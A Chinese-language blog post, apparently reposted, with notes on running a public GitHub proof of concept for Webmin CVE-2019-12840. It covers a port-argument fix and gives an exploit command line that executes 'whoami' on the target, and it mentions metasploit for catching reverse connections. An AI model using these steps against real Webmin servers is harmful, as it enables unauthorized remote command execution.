栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

CVE

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

CVE

GitHub - KrE80r/webmin_cve-2019-12840_poc: A standalone POC for CVE-2019-12840A standalone POC for CVE-2019-12840. Contribute to KrE80r/webmin_cve-2019-12840_poc development by creating an account on GitHub.https://github.com/KrE80r/webmin_cve-2019-12840_pocCVE-2020-35606使用的还是CVE-2019-12840的执行脚本 换了新的载体 利用方式还是一样的

https://ip:port/session_login.cgi

加上https://可以跳转到登录页面 直接登录

测试了一下上面这个POC比较好用

下载后需要修改一下就port 自带的是10000 如果不修改 访问的所有的连接都是ip:port:1000导致失败 无法登录 不大不小的坑 愣是没发现

121行  parser.add_argument( -p , dest port , default 1000 , help target port )

将“1000”修改为目标的端口

执行脚本

python2 CVE-2019-12840.py -u  https://ip  -U username  -P password  -lport  17146(修改了脚本这里的端口可加可不加)  -c whoami    

 执行成功 如

-c 执行一直失败 因为靶机在公网 我这里没有公网 看别人说的是使用metasploit监听回连

未完待续

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/266736.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号